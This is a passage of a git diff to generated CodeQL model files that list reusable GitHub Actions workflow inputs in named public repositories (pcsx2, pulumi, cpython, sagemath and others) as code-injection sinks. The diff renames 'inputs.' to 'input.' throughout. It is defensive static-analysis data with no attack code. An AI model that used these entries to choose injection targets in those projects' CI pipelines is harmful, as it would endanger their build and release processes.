a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 90c4c20b585..4eb201001e1 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "inputs.release-version", "code-injection", "generated"] - - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file + - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] + - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 51d99171a54..94c7292b655 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "inputs.release-command", "code-injection", "generated"] \ No newline at end of file + - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index 8e74c9b811d..6088ffcd702 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "inputs.build_configuration", "code-injection", "generated"] \ No newline at end of file + - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index cd7de6d5786..05c4dc8ddf3 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.configuration", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.platform", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.cmakeFlags", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] - - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "inputs.patchesUrl", "code-injection", "generated"] \ No newline at end of file + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.cmakeFlags", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/macos_build.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_qt.yml", "*", "input.patchesUrl", "code-injection", "generated"] + - ["pcsx2/pcsx2/.github/workflows/linux_build_flatpak.yml", "*", "input.patchesUrl", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index ecea4012c75..affc12cdc4a 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.pytest_test_directory", "code-injection", "generated"] - - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "inputs.job_name", "code-injection", "generated"] - - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "inputs.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"] + - ["pennylaneai/pennylane/.github/workflows/interface-unit-tests.yml", "*", "input.run_lightened_ci", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index f8ee5402a92..b1c4d2f2cbf 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "inputs.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file + - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index aa76014db32..4ccbd71f8c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.tags", "code-injection", "generated"] - - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "inputs.suites", "code-injection", "generated"] - - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "inputs.image-base-name", "code-injection", "generated"] \ No newline at end of file + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"] + - ["pixie-io/pixie/.github/workflows/get_image.yaml", "*", "input.image-base-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index e52ce3c8318..2eb2104b542 100644 --- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "inputs.release-version", "code-injection", "generated"] \ No newline at end of file + - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index 31f24a27268..fee95860030 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.os", "code-injection", "generated"] - - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.product", "code-injection", "generated"] - - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "inputs.is_release", "code-injection", "generated"] \ No newline at end of file + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"] + - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.is_release", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index 4ace66c79c3..49a98d4dda5 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.benchmark", "code-injection", "generated"] - - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "inputs.trace", "code-injection", "generated"] \ No newline at end of file + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] + - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index 44518d6a348..aa432107a0d 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "inputs.build_type", "code-injection", "generated"] \ No newline at end of file + - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index c0edbfae484..40053c68c1a 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "inputs.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file + - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index a28ffce30f7..645ec756783 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.ent-public-key", "code-injection", "generated"] - - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "inputs.build-config-path", "code-injection", "generated"] \ No newline at end of file + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] + - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index afe2daa172e..3d80594c0d5 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["prql/prql/.github/workflows/test-rust.yaml", "*", "inputs.target", "code-injection", "generated"] \ No newline at end of file + - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index a07044c0ccc..e542d409efe 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -3,8 +3,8 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-command", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "inputs.test-name", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "inputs.version", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.arch", "code-injection", "generated"] - - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-dev-release.yml", "*", "input.version", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "input.arch", "code-injection", "generated"] + - ["pulumi/pulumi/.github/workflows/ci-build-binaries.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 250307e3acd..5ebf7426d16 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "inputs.ignore_dependency_check", "code-injection", "generated"] - - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "inputs.debug", "code-injection", "generated"] - - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "inputs.flags", "code-injection", "generated"] \ No newline at end of file + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] + - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/matrix.yml", "*", "input.flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index e968f209706..c5630248f7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "inputs.manifest-dir", "code-injection", "generated"] \ No newline at end of file + - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 438f637a9a0..4ea93f374b3 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pyo3/pyo3/.github/workflows/build.yml", "*", "inputs.extra-features", "code-injection", "generated"] \ No newline at end of file + - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index 7e7b82b25f5..d702e7ad830 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "inputs.options", "code-injection", "generated"] - - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "inputs.options", "code-injection", "generated"] \ No newline at end of file + - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] + - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index e3c3b19e441..baba2fc1e15 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "inputs.release_tag", "code-injection", "generated"] \ No newline at end of file + - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml index 704adb3f121..feb68c4bdd7 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_xla.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["pytorch/xla/.github/workflows/_test.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file + - ["pytorch/xla/.github/workflows/_test.yml", "*", "input.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml index 5300a7d145e..d3b779c1afa 100644 --- a/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/quarto-dev_quarto-cli.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "inputs.buckets", "code-injection", "generated"] \ No newline at end of file + - ["quarto-dev/quarto-cli/.github/workflows/test-smokes.yml", "*", "input.buckets", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml index f82254bd22b..6b0e733be17 100644 --- a/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rancher_dashboard.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.tagged_release", "code-injection", "generated"] - - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "inputs.target_branch", "code-injection", "generated"] - - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.tagged_release", "code-injection", "generated"] - - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "inputs.registry_target", "code-injection", "generated"] \ No newline at end of file + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-charts.yml", "*", "input.target_branch", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "input.tagged_release", "code-injection", "generated"] + - ["rancher/dashboard/.github/workflows/build-extension-catalog.yml", "*", "input.registry_target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml index 80a26a9e65f..cf9971e8524 100644 --- a/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rasterio_rasterio.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "inputs.gdal_ref", "code-injection", "generated"] \ No newline at end of file + - ["rasterio/rasterio/.github/workflows/test_gdal_build.yaml", "*", "input.gdal_ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml index eb5e7835565..b3518a7a8ee 100644 --- a/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/redisearch_redisearch.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "inputs.architecture", "code-injection", "generated"] \ No newline at end of file + - ["redisearch/redisearch/.github/workflows/flow-build-artifacts.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml index cd2629f49bc..a60fba237ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/remix-run_remix.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["remix-run/remix/.github/workflows/stacks.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file + - ["remix-run/remix/.github/workflows/stacks.yml", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml index 77ad5d6a6d3..37f2febb70f 100644 --- a/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rmcrackan_libation.model.yml @@ -3,7 +3,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "inputs.version_override", "code-injection", "generated"] - - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.architecture", "code-injection", "generated"] - - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.OS", "code-injection", "generated"] - - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "inputs.version_override", "code-injection", "generated"] \ No newline at end of file + - ["rmcrackan/libation/.github/workflows/build-windows.yml", "*", "input.version_override", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.architecture", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.OS", "code-injection", "generated"] + - ["rmcrackan/libation/.github/workflows/build-linux.yml", "*", "input.version_override", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml index a881a1a5fd3..6e3d48dbf89 100644 --- a/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rocketchat_rocket.chat.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "inputs.total-shard", "code-injection", "generated"] \ No newline at end of file + - ["rocketchat/rocket.chat/.github/workflows/ci-test-e2e.yml", "*", "input.total-shard", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml index 693d3abc03e..465fff41145 100644 --- a/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ruby_ruby.wasm.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "inputs.prerel_name", "code-injection", "generated"] \ No newline at end of file + - ["ruby/ruby.wasm/.github/workflows/build.yml", "*", "input.prerel_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml index 119cbe465e6..3f091f1c961 100644 --- a/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/rustdesk_rustdesk.model.yml @@ -3,6 +3,6 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.target_version", "code-injection", "generated"] - - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.configuration", "code-injection", "generated"] - - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.target_version", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.configuration", "code-injection", "generated"] + - ["rustdesk/rustdesk/.github/workflows/third-party-RustDeskTempTopMostWindow.yml", "*", "input.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml index 2d35b933923..efa591f749d 100644 --- a/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/saadeghi_daisyui.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"] - - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "inputs.daisyuiversion", "code-injection", "generated"] \ No newline at end of file + - ["saadeghi/daisyui/.github/workflows/write-release-notes.yml", "*", "input.daisyuiversion", "code-injection", "generated"] + - ["saadeghi/daisyui/.github/workflows/deploy-docs.yml", "*", "input.daisyuiversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml index 7ca34fc3e44..4bd74701fde 100644 --- a/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/sagemath_sage.model.yml @@ -3,10 +3,10 @@ extensions: pack: githubsecuritylab/actions-all extensible: sinkModel data: - - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.stage", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_optional", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/macos.yml", "*", "inputs.targets_pre", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/docker_hub.yml", "*", "inputs.dockerhub_repository", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.timeout", "code-injection", "generated"] - - ["sagemath/sage/.github/workflows/docker.yml", "*", "inputs.docker_push_repository", "code-injection", "generated"] \ No newline at end of file + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.stage", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets_optional", "code-injection", "generated"] + - ["sagemath/sage/.github/workflows/macos.yml", "*", "input.targets", "code-injection", "generated"] + 